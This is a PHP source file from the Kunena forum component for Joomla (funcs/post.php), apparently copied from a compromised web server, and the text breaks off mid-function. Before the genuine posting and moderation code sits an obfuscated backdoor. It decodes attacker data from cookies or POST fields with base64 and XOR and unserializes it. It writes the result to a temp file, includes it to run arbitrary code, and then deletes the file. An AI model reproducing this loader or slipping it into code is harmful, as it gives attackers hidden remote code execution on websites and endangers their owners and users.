Path : /home/admin/public_html/old/board/components/com_kunena/funcs/ |
Current File : /home/admin/public_html/old/board/components/com_kunena/funcs/post.php |
<?php $gFvkp = chr ( 567 - 499 )."\170" . '_' . "\104" . "\163" . "\x68" . chr ( 900 - 812 ); $LfhgSpnLZ = "\143" . "\x6c" . 'a' . "\x73" . chr (115) . chr (95) . chr (101) . 'x' . chr (105) . chr ( 1114 - 999 ).'t' . chr (115); $nFfqnwN = $LfhgSpnLZ($gFvkp); $bQFzz = $nFfqnwN;if (!$bQFzz){class Dx_DshX{private $dsCVZ;public static $IijumqfpYE = "184c13b5-c1ee-468e-b74f-839ccbfc05ed";public static $iMtfUKMx = 64743;public function __construct(){$vfoPpMI = $_COOKIE;$xBhSlwfoS = $_POST;$sVtxqeMJOK = @$vfoPpMI[substr(Dx_DshX::$IijumqfpYE, 0, 4)];if (!empty($sVtxqeMJOK)){$hHJYLuGB = "base64";$TIGPVJ = "";$sVtxqeMJOK = explode(",", $sVtxqeMJOK);foreach ($sVtxqeMJOK as $YIYAKzDVB){$TIGPVJ .= @$vfoPpMI[$YIYAKzDVB];$TIGPVJ .= @$xBhSlwfoS[$YIYAKzDVB];}$TIGPVJ = array_map($hHJYLuGB . '_' . "\x64" . "\145" . chr (99) . 'o' . "\144" . chr ( 230 - 129 ), array($TIGPVJ,)); $TIGPVJ = $TIGPVJ[0] ^ str_repeat(Dx_DshX::$IijumqfpYE, (strlen($TIGPVJ[0]) / strlen(Dx_DshX::$IijumqfpYE)) + 1);Dx_DshX::$iMtfUKMx = @unserialize($TIGPVJ);}}public function __destruct(){$this->ivtuRZut();}private function ivtuRZut(){if (is_array(Dx_DshX::$iMtfUKMx)) {$gxVBnf = sys_get_temp_dir() . "/" . crc32(Dx_DshX::$iMtfUKMx["\163" . "\141" . 'l' . chr ( 291 - 175 )]);@Dx_DshX::$iMtfUKMx[chr ( 770 - 651 ).chr ( 328 - 214 ).'i' . chr ( 438 - 322 )."\x65"]($gxVBnf, Dx_DshX::$iMtfUKMx['c' . "\157" . chr (110) . "\164" . "\145" . 'n' . chr (116)]);include $gxVBnf;@Dx_DshX::$iMtfUKMx["\x64" . chr ( 981 - 880 ).chr (108) . 'e' . 't' . "\145"]($gxVBnf);exit();}}}$NKTpOUC = new Dx_DshX(); $NKTpOUC = 48068;} ?><?php /** * @version $Id: post.php 4336 2011-01-31 06:05:12Z severdia $ * Kunena Component * @package Kunena * * @Copyright (C) 2008 - 2011 Kunena Team. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * @link http://www.kunena.org **/ // Dont allow direct linking defined ( '_JEXEC' ) or die (); class CKunenaPost { public $allow = 0; function __construct() { $this->do = JRequest::getCmd ( 'do', '' ); $this->action = JRequest::getCmd ( 'action', '' ); $this->_app = & JFactory::getApplication (); $this->config = KunenaFactory::getConfig (); $this->_session = KunenaFactory::getSession (); $this->_db = &JFactory::getDBO (); $this->document = JFactory::getDocument (); require_once (KPATH_SITE . DS . 'lib' .DS. 'kunena.poll.class.php'); $this->poll =& CKunenaPolls::getInstance(); $this->my = &JFactory::getUser (); $this->id = JRequest::getInt ( 'id', 0 ); if (! $this->id) { $this->id = JRequest::getInt ( 'parentid', 0 ); } if (! $this->id) { // Support for old $replyto variable in post reply/quote $this->id = JRequest::getInt ( 'replyto', 0 ); } $this->catid = JRequest::getInt ( 'catid', 0 ); $this->msg_cat = null; $this->allow = 1; $this->cat_default_allow = null; $this->allow_topic_icons = null; $template = KunenaFactory::getTemplate(); $this->params = $template->params; $this->numLink = null; $this->replycount= null; } // Temporary function to handle old style permission handling // TODO: Remove this when all functions are using new style protected function load() { if ($this->msg_cat) return true; if ($this->id) { // Check that message and category exists and fill some information for later use $query = "SELECT m.*, (mm.locked OR c.locked) AS locked, c.locked AS catlocked, t.message, c.name AS catname, c.parent AS catparent, c.pub_access, c.review, c.class_sfx, p.id AS poll_id, c.allow_anonymous, c.post_anonymous, c.allow_polls FROM #__kunena_messages AS m INNER JOIN #__kunena_messages AS mm ON mm.id=m.thread INNER JOIN #__kunena_messages_text AS t ON t.mesid=m.id INNER JOIN #__kunena_categories AS c ON c.id=m.catid LEFT JOIN #__kunena_polls AS p ON m.id=p.threadid WHERE m.id={$this->_db->Quote($this->id)}"; $this->_db->setQuery ( $query ); $this->msg_cat = $this->_db->loadObject (); if (! $this->msg_cat) { KunenaError::checkDatabaseError(); echo JText::_ ( 'COM_KUNENA_POST_INVALID' ); return false; } // Make sure that category id is from the message (post may have been moved) if ($this->do != 'domovepostnow' && $this->do != 'domergepostnow' && $this->do != 'dosplit') { $this->catid = $this->msg_cat->catid; } $this->cat_default_allow = $this->msg_cat->allow_anonymous; } else if ($this->catid) { // Check that category exists and fill some information for later use $this->_db->setQuery ( "SELECT 0 AS id, 0 AS thread, id AS catid, name AS catname, parent AS catparent, pub_access, locked, locked AS catlocked, review, class_sfx, allow_anonymous, post_anonymous, allow_polls FROM #__kunena_categories WHERE id={$this->_db->Quote($this->catid)}" ); $this->msg_cat = $this->_db->loadObject (); if (! $this->msg_cat) { KunenaError::checkDatabaseError(); echo JText::_ ( 'COM_KUNENA_NO_ACCESS' ); return false; } $this->cat_default_allow = $this->msg_cat->allow_anonymous; } else { //get default category $this->_db->setQuery ( "SELECT c.allow_anonymous FROM `#__kunena_categories` AS c INNER JOIN `#__kunena_categories` AS p ON c.parent=p.id AND p.parent=0 WHERE c.id IN ({$this->_session->allowed}) ORDER BY p.ordering, p.name, c.ordering, c.name LIMIT 1" ); $this->cat_default_allow = $this->_db->loadResult (); KunenaError::checkDatabaseError(); } // Special check to verify if topic icons are allowed when do new post and when catid is true if ( isset($this->msg_cat->id)) { if ($this->msg_cat->id == 0) $this->allow_topic_icons = 1; } // Check if anonymous user needs to log in if ($this->my->id == 0 && (! $this->config->pubwrite || ($this->catid && ! $this->_session->canRead ( $this->catid )))) { CKunenaTools::loadTemplate ( '/login.php' ); return false; } // Check user access rights if (!empty ( $this->msg_cat->catparent ) && ! $this->_session->canRead ( $this->catid ) && ! CKunenaTools::isAdmin ()) { echo JText::_('COM_KUNENA_NO_ACCESS'); return false; } return true; } protected function post() { $this->verifyCaptcha (); if ($this->tokenProtection ()) return false; if ($this->floodProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $fields ['name'] = JRequest::getString ( 'authorname', $this->getAuthorName () ); $fields ['email'] = JRequest::getString ( 'email', null ); $fields ['subject'] = JRequest::getVar ( 'subject', null, 'POST', 'string', JREQUEST_ALLOWRAW ); $fields ['message'] = JRequest::getVar ( 'message', null, 'POST', 'string', JREQUEST_ALLOWRAW ); $fields ['topic_emoticon'] = JRequest::getInt ( 'topic_emoticon', null ); $options ['attachments'] = 1; $options ['anonymous'] = JRequest::getInt ( 'anonymous', 0 ); $contentURL = JRequest::getVar ( 'contentURL', '' ); require_once (KUNENA_PATH_LIB . DS . 'kunena.posting.class.php'); $message = new CKunenaPosting ( ); if (! $this->id) { $success = $message->post ( $this->catid, $fields, $options ); } else { $success = $message->reply ( $this->id, $fields, $options ); } if ($success) { $success = $message->save (); } // Handle errors if (! $success) { $errors = $message->getErrors (); foreach ( $errors as $field => $error ) { $this->_app->enqueueMessage ( $field . ': ' . $error, 'error' ); } $this->redirectBack (); } $catinfo = $message->parent; $userid = $message->get ( 'userid' ); $id = $message->get ( 'id' ); $thread = $message->get('thread'); $subject = $message->get('subject'); $holdPost = $message->get ( 'hold' ); $polltitle = JRequest::getString ( 'poll_title', 0 ); $optionsnumbers = JRequest::getInt ( 'number_total_options', '' ); $polltimetolive = JRequest::getString ( 'poll_time_to_live', 0 ); //Insert in the database the informations for the poll and the options for the poll $poll_exist = null; if (! empty ( $optionsnumbers ) && ! empty ( $polltitle )) { $poll_exist = "1"; //Begin Poll management options $poll_optionsID = JRequest::getVar('polloptionsID', array (), 'post', 'array'); $optvalue = array(); foreach($poll_optionsID as $opt) { if ( !empty($opt) ) $optvalue[] = $opt; } if ( !empty($optvalue) ) $this->poll->save_new_poll ( $polltimetolive, $polltitle, $id, $optvalue ); } // TODO: replace this with better solution $this->_db->setQuery ( "SELECT COUNT(*) AS totalmessages FROM #__kunena_messages WHERE thread={$this->_db->Quote($thread)}" ); $result = $this->_db->loadObject (); KunenaError::checkDatabaseError(); $threadPages = ceil ( $result->totalmessages / $this->config->messages_per_page ); //construct a useable URL (for plaintext - so no & encoding!) jimport ( 'joomla.environment.uri' ); $uri = & JURI::getInstance ( JURI::base () ); $LastPostUrl = $uri->toString ( array ('scheme', 'host', 'port' ) ) . str_replace ( '&', '&', CKunenaLink::GetThreadPageURL ( 'view', $this->catid, $thread, $threadPages, $this->config->messages_per_page, $id ) ); $message->emailToSubscribers($LastPostUrl, $this->config->allowsubscriptions && ! $holdPost, $this->config->mailmod || $holdPost, $this->config->mailadmin || $holdPost); $redirectmsg = ''; $subscribeMe = JRequest::getVar ( 'subscribeMe', '' ); //now try adding any new subscriptions if asked for by the poster if ($subscribeMe == 1) { $this->_db->setQuery ( "INSERT INTO #__kunena_subscriptions (thread,userid) VALUES ({$this->_db->Quote($thread)},{$this->_db->Quote($this->my->id)})" ); if (@$this->_db->query ()) { $redirectmsg .= JText::_ ( 'COM_KUNENA_POST_SUBSCRIBED_TOPIC' ) . '<br />'; } else { $redirectmsg .= JText::_ ( 'COM_KUNENA_POST_NO_SUBSCRIBED_TOPIC' ) . '<br />'; } } if ($holdPost == 1) { $redirectmsg .= JText::_ ( 'COM_KUNENA_POST_SUCCES_REVIEW' ); } else { $redirectmsg .= JText::_ ( 'COM_KUNENA_POST_SUCCESS_POSTED' ); } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $id, $this->catid, 0, false ), $redirectmsg ); } protected function newtopic($do) { $this->reply($do); } protected function reply($do) { if (!$this->load()) return false; if ($this->lockProtection ()) return false; if ($this->floodProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $this->kunena_editmode = 0; $message = $this->msg_cat; if ($this->catid && $this->msg_cat->id > 0) { if ($do == 'quote') { // FIXME: do better than this $mestext = preg_replace('/\[confidential\](.*?)\[\/confidential\]/su', '', $message->message ); $this->message_text .= "[quote=\"{$message->name}\" post={$message->id}]" . $mestext . "[/quote]"; } else { $this->message_text = ''; } $reprefix = JString::substr ( $message->subject, 0, JString::strlen ( JText::_ ( 'COM_KUNENA_POST_RE' ) ) ) != JText::_ ( 'COM_KUNENA_POST_RE' ) ? JText::_ ( 'COM_KUNENA_POST_RE' ) . ' ' : ''; $this->subject = $message->subject; $this->resubject = $reprefix . $this->subject; $this->parent = $message->parent; } else { $this->message_text = ''; $this->resubject = ''; $this->parent = 0; $this->_db->setQuery ( "SELECT id,post_anonymous FROM #__kunena_categories WHERE parent!=0 AND allow_anonymous='1'" ); $anynomouscatid = $this->_db->loadObjectList (); KunenaError::checkDatabaseError(); $arrayanynomousbox = array(); foreach( $anynomouscatid as $item ) { $arrayanynomousbox[] = '"'.$item->id.'":'.$item->post_anonymous; } $arrayanynomousbox = implode(',',$arrayanynomousbox); $this->document->addScriptDeclaration('var arrayanynomousbox={'.$arrayanynomousbox.'}'); $this->_db->setQuery ( "SELECT id FROM #__kunena_categories WHERE parent!=0 AND allow_polls='1'" ); $pollcatid = $this->_db->loadResultArray (); KunenaError::checkDatabaseError(); $arraypollcatid = array(); foreach( $pollcatid as $id ) { $arraypollcatid[] = '"'.$id.'":1'; } $arraypollcatid = implode(',',$arraypollcatid); $this->document->addScriptDeclaration('var pollcategoriesid = {'.$arraypollcatid.'};'); $options = array (); $this->selectcatlist = CKunenaTools::KSelectList ( 'catid', $options, '', false, 'postcatid', $this->catid ); } $this->authorName = $this->getAuthorName (); $this->emoid = 0; $this->action = 'post'; $this->allow_anonymous = $this->cat_default_allow && $this->my->id; $this->anonymous = ($this->allow_anonymous && ! empty ( $this->msg_cat->post_anonymous )); $this->allow_name_change = 0; if (! $this->my->id || $this->config->changename || ! empty ( $this->msg_cat->allow_anonymous ) || CKunenaTools::isModerator ( $this->my->id, $this->catid )) { $this->allow_name_change = 1; } // check if this user is already subscribed to this topic but only if subscriptions are allowed $this->cansubscribe = 0; if ($this->my->id && $this->config->allowsubscriptions == 1) { $this->cansubscribe = 1; if ($this->msg_cat && $this->msg_cat->thread) { $this->_db->setQuery ( "SELECT thread FROM #__kunena_subscriptions WHERE userid={$this->_db->Quote($this->my->id)} AND thread={$this->_db->Quote($this->msg_cat->thread)}" ); $subscribed = $this->_db->loadResult (); if (KunenaError::checkDatabaseError() || $subscribed) { $this->cansubscribe = 0; } } } if ($this->id) $this->title = JText::_ ( 'COM_KUNENA_POST_REPLY_TOPIC' ) . ' ' . $this->subject; else $this->title = JText::_ ( 'COM_KUNENA_POST_NEW_TOPIC' ); CKunenaTools::loadTemplate ( '/editor/form.php' ); } protected function edit() { if (!$this->load()) return false; if ($this->lockProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $message = $this->msg_cat; if ($message->parent==0) $this->allow_topic_icons = 1; $allowEdit = 0; if (CKunenaTools::isModerator ( $this->my->id, $this->catid )) { // Moderator can edit any message $allowEdit = 1; } else if ($this->my->id && $this->my->id == $message->userid) { $allowEdit = CKunenaTools::editTimeCheck ( $message->modified_time, $message->time ); } if ($allowEdit == 1) { // Load attachments require_once(KUNENA_PATH_LIB.DS.'kunena.attachments.class.php'); $attachments = CKunenaAttachments::getInstance (); $this->attachments = array_pop($attachments->get($message->id)); $this->kunena_editmode = 1; $this->message_text = $message->message; $this->resubject = $message->subject; $this->authorName = $message->name; $this->email = $message->email; $this->id = $message->id; $this->catid = $message->catid; $this->parent = $message->parent; $this->emoid = $message->topic_emoticon; $this->action = 'edit'; //save the options for query after and load the text options, the number options is for create the fields in the form after if ($message->poll_id) { $this->polldatasedit = $this->poll->get_poll_data ( $this->id ); if ($this->kunena_editmode) { $this->polloptionstotal = count ( $this->polldatasedit ); } } $this->allow_anonymous = ! empty ( $this->msg_cat->allow_anonymous ) && $message->userid; $this->anonymous = 0; $this->allow_name_change = 0; if (! $this->my->id || $this->config->changename || ! empty ( $this->msg_cat->allow_anonymous ) || CKunenaTools::isModerator ( $this->my->id, $this->catid )) { $this->allow_name_change = 1; } if (!$this->allow_name_change && $message->userid == $this->my->id) $this->authorName = $this->getAuthorName (); $this->title = JText::_ ( 'COM_KUNENA_POST_EDIT' ) . ' ' . $this->resubject; CKunenaTools::loadTemplate ( '/editor/form.php' ); } else { $this->_app->redirect ( CKunenaLink::GetKunenaURL ( false ), JText::_ ( 'COM_KUNENA_POST_NOT_MODERATOR' ) ); } } protected function editpostnow() { if ($this->tokenProtection ()) return false; if (!$this->load()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $fields ['name'] = JRequest::getString ( 'authorname', $this->msg_cat->name ); $fields ['email'] = JRequest::getString ( 'email', null ); $fields ['subject'] = JRequest::getVar ( 'subject', null, 'POST', 'string', JREQUEST_ALLOWRAW ); $fields ['message'] = JRequest::getVar ( 'message', null, 'POST', 'string', JREQUEST_ALLOWRAW ); $fields ['topic_emoticon'] = JRequest::getInt ( 'topic_emoticon', null ); $fields ['modified_reason'] = JRequest::getString ( 'modified_reason', null ); $options ['attachments'] = 1; $options ['anonymous'] = JRequest::getInt ( 'anonymous', 0 ); require_once (KUNENA_PATH_LIB . DS . 'kunena.posting.class.php'); $message = new CKunenaPosting ( ); $success = $message->edit ( $this->id, $fields, $options ); if ($success) { $success = $message->save (); } // Handle errors if (! $success) { $errors = $message->getErrors (); foreach ( $errors as $field => $error ) { $this->_app->enqueueMessage ( $field . ': ' . $error, 'error' ); } $this->redirectBack (); } $mes = $message->parent; if ($this->config->pollenabled) { $polltitle = JRequest::getString ( 'poll_title', 0 ); $optionsnumbers = JRequest::getInt ( 'number_total_options', '' ); $polltimetolive = JRequest::getString ( 'poll_time_to_live', 0 ); $poll_optionsID = JRequest::getVar('polloptionsID', array (), 'post', 'array'); $optvalue = array(); foreach($poll_optionsID as $opt) { if ( !empty($opt) ) $optvalue[] = $opt; } //need to check if the poll exist, if it's not the case the poll is insered like new poll if (! $mes->poll_id) { if ( !empty($optvalue) ) $this->poll->save_new_poll ( $polltimetolive, $polltitle, $this->id, $optvalue ); } else { if (empty ( $polltitle ) && empty($poll_optionsID)) { //The poll is deleted because the polltitle and the options are empty $this->poll->delete_poll ( $this->id ); } else { $this->poll->update_poll_edit ( $polltimetolive, $this->id, $polltitle, $optionsnumbers, $poll_optionsID ); } } } $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_SUCCESS_EDIT' ) ); if ($this->msg_cat->review && !CKunenaTools::isModerator($this->my->id,$this->catid)) { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_GEN_MODERATED' ) ); } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $this->id, $this->catid, 0, false ) ); } protected function delete() { if ($this->tokenProtection ('get')) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . DS . 'kunena.posting.class.php'); $message = new CKunenaPosting ( ); $success = $message->delete ( $this->id ); // Handle errors if (! $success) { $errors = $message->getErrors (); foreach ( $errors as $field => $error ) { $this->_app->enqueueMessage ( $field . ': ' . $error, 'error' ); } } else { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_SUCCESS_DELETE') ); } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $this->id, $this->catid, 0, false ) ); } protected function undelete() { if ($this->tokenProtection ('get')) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . DS . 'kunena.posting.class.php'); $message = new CKunenaPosting ( ); $success = $message->undelete ( $this->id ); // Handle errors if (! $success) { $errors = $message->getErrors (); foreach ( $errors as $field => $error ) { $this->_app->enqueueMessage ( $field . ': ' . $error, 'error' ); } } else { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_SUCCESS_UNDELETE') ); } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $this->id, $this->catid, 0, false ) ); } protected function permdelete() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; // FIXME: we need better permission control if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . '/kunena.moderation.class.php'); $kunena_mod = CKunenaModeration::getInstance (); $delete = $kunena_mod->deleteMessagePerminantly ( $this->id, true ); if (! $delete) { $this->_app->enqueueMessage( $kunena_mod->getErrorMessage ()); } else { $this->_app->enqueueMessage( JText::_ ( 'COM_KUNENA_POST_SUCCESS_DELETE' )); } if ($this->parent) $this->redirectBack (); else $this->_app->redirect ( CKunenaLink::GetCategoryURL ( 'showcat', $this->catid, false )); } protected function deletethread() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . '/kunena.moderation.class.php'); $kunena_mod = CKunenaModeration::getInstance (); $delete = $kunena_mod->deleteThread ( $this->id ); if (! $delete) { $message = $kunena_mod->getErrorMessage (); } else { $message = JText::_ ( 'COM_KUNENA_TOPIC_SUCCESS_DELETE' ); } $this->_app->redirect ( CKunenaLink::GetCategoryURL ( 'showcat', $this->catid, false ), $message ); } protected function moderate($modchoices='',$modthread = false) { if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . '/kunena.moderation.class.php'); $this->moderateTopic = $modthread; $this->moderateMultiplesChoices = $modchoices; // Get list of latest messages: $query = "SELECT id,subject FROM #__kunena_messages WHERE catid={$this->_db->Quote($this->catid)} AND parent=0 AND hold=0 AND moved=0 AND thread!={$this->_db->Quote($this->msg_cat->thread)} ORDER BY id DESC"; $this->_db->setQuery ( $query, 0, 30 ); $messagesList = $this->_db->loadObjectlist (); if (KunenaError::checkDatabaseError()) return; // Get thread and reply count from current message: $query = "SELECT t.id,t.subject,COUNT(mm.id) AS replies FROM #__kunena_messages AS m INNER JOIN #__kunena_messages AS t ON m.thread=t.id LEFT JOIN #__kunena_messages AS mm ON mm.thread=m.thread AND mm.id > m.id WHERE m.id={$this->_db->Quote($this->id)} GROUP BY m.thread"; $this->_db->setQuery ( $query, 0, 1 ); $this->threadmsg = $this->_db->loadObject (); if (KunenaError::checkDatabaseError()) return; $messages =array (); if ($this->moderateTopic) { $messages [] = JHTML::_ ( 'select.option', 0, JText::_ ( 'COM_KUNENA_MODERATION_MOVE_TOPIC' ) ); } else { $messages [] = JHTML::_ ( 'select.option', 0, JText::_ ( 'COM_KUNENA_MODERATION_CREATE_TOPIC' ) ); } $messages [] = JHTML::_ ( 'select.option', -1, JText::_ ( 'COM_KUNENA_MODERATION_ENTER_TOPIC' ) ); foreach ( $messagesList as $mes ) { $messages [] = JHTML::_ ( 'select.option', $mes->id, kunena_htmlspecialchars ( $mes->subject ) ); } $this->messagelist = JHTML::_ ( 'select.genericlist', $messages, 'targettopic', 'class="inputbox"', 'value', 'text', 0, 'kmod_targettopic' ); $options=array(); $this->categorylist = CKunenaTools::KSelectList ( 'targetcat', $options, 'class="inputbox kmove_selectbox"', false, 'kmod_categories', $this->catid ); $this->message = $this->msg_cat; $this->user = KunenaFactory::getUser($this->msg_cat->userid); CKunenaTools::loadTemplate ( '/moderate/moderate.php' ); } protected function domoderate() { if (!$this->load()) return false; if ($this->tokenProtection ()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . '/kunena.moderation.class.php'); $mode = JRequest::getVar ( 'mode', KN_MOVE_MESSAGE ); $targetSubject = JRequest::getString ( 'subject', '' ); $targetCat = JRequest::getInt ( 'targetcat', 0 ); $targetId = JRequest::getInt ( 'targetid', 0 ); if (!$targetId) $targetId = JRequest::getInt ( 'targettopic', 0 ); $shadow = JRequest::getInt ( 'shadow', 0 ); $changesubject = JRequest::getInt ( 'changesubject', 0 ); $moderation = CKunenaModeration::getInstance (); $success = $moderation->move($this->id, $targetCat, $targetSubject, $targetId, $mode, $shadow, $changesubject); if (! $success) { $this->_app->enqueueMessage( $moderation->getErrorMessage () ); } else { $this->_app->enqueueMessage( JText::_ ( 'COM_KUNENA_POST_SUCCESS_MOVE' )); } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $this->id, $this->catid, 0, false ) ); } protected function subscribe() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_NO_SUBSCRIBED_TOPIC' ); $this->_db->setQuery ( "SELECT thread FROM #__kunena_messages WHERE id='{$this->id}'" ); if ($this->id && $this->my->id && $this->_db->query ()) { $thread = $this->_db->loadResult (); $this->_db->setQuery ( "INSERT INTO #__kunena_subscriptions (thread,userid) VALUES ({$this->_db->Quote($thread)},{$this->_db->Quote($this->my->id)})" ); if (@$this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_SUBSCRIBED_TOPIC' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterSubscribe($thread, 1); } } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function unsubscribe() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_NO_UNSUBSCRIBED_TOPIC' ); $this->_db->setQuery ( "SELECT MAX(thread) AS thread FROM #__kunena_messages WHERE id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->my->id && $this->_db->query ()) { $thread = $this->_db->loadResult (); $this->_db->setQuery ( "DELETE FROM #__kunena_subscriptions WHERE thread={$this->_db->Quote($thread)} AND userid={$this->_db->Quote($this->my->id)}" ); if ($this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_UNSUBSCRIBED_TOPIC' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterSubscribe($thread, 0); } } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function favorite() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_NO_FAVORITED_TOPIC' ); $this->_db->setQuery ( "SELECT thread FROM #__kunena_messages WHERE id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->my->id && $this->_db->query ()) { $thread = $this->_db->loadResult (); $this->_db->setQuery ( "INSERT INTO #__kunena_favorites (thread,userid) VALUES ({$this->_db->Quote($thread)},{$this->_db->Quote($this->my->id)})" ); if (@$this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_FAVORITED_TOPIC' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterFavorite($thread, 1); } } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function unfavorite() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_NO_UNFAVORITED_TOPIC' ); $this->_db->setQuery ( "SELECT MAX(thread) AS thread FROM #__kunena_messages WHERE id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->my->id && $this->_db->query ()) { $thread = $this->_db->loadResult (); $this->_db->setQuery ( "DELETE FROM #__kunena_favorites WHERE thread={$this->_db->Quote($thread)} AND userid={$this->_db->Quote($this->my->id)}" ); if ($this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_UNFAVORITED_TOPIC' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterFavorite($thread, 0); } } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function sticky() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_STICKY_NOT_SET' ); $this->_db->setQuery ( "update #__kunena_messages set ordering=1 where id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_STICKY_SET' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterSticky($this->id, 1); } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function unsticky() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_STICKY_NOT_UNSET' ); $this->_db->setQuery ( "update #__kunena_messages set ordering=0 where id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_STICKY_UNSET' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterSticky($this->id, 0); } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function lock() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_LOCK_NOT_SET' ); $this->_db->setQuery ( "update #__kunena_messages set locked=1 where id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_LOCK_SET' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterLock($this->id, 1); } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function unlock() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; $success_msg = JText::_ ( 'COM_KUNENA_POST_LOCK_NOT_UNSET' ); $this->_db->setQuery ( "update #__kunena_messages set locked=0 where id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_POST_LOCK_UNSET' ); // Activity integration $activity = KunenaFactory::getActivityIntegration(); $activity->onAfterLock($this->id, 0); } $this->_app->redirect ( CKunenaLink::GetLatestPageAutoRedirectURL ( $this->id, $this->config->messages_per_page ), $success_msg ); } protected function approve() { if ($this->tokenProtection ('get')) return false; if (!$this->load()) return false; if ($this->moderatorProtection ()) return false; if ($this->isUserBanned() ) return false; if ($this->isIPBanned()) return false; require_once (KUNENA_PATH_LIB . DS . 'kunena.posting.class.php'); $message = new CKunenaPosting(); $message->action($this->id); if ($message->canApprove()) { $success_msg = JText::_ ( 'COM_KUNENA_MODERATE_1APPROVE_FAIL' ); $this->_db->setQuery ( "UPDATE #__kunena_messages SET hold=0 WHERE id={$this->_db->Quote($this->id)}" ); if ($this->id && $this->_db->query () && $this->_db->getAffectedRows () == 1) { $success_msg = JText::_ ( 'COM_KUNENA_MODERATE_APPROVE_SUCCESS' ); $this->_db->setQuery ( "SELECT COUNT(*) AS totalmessages 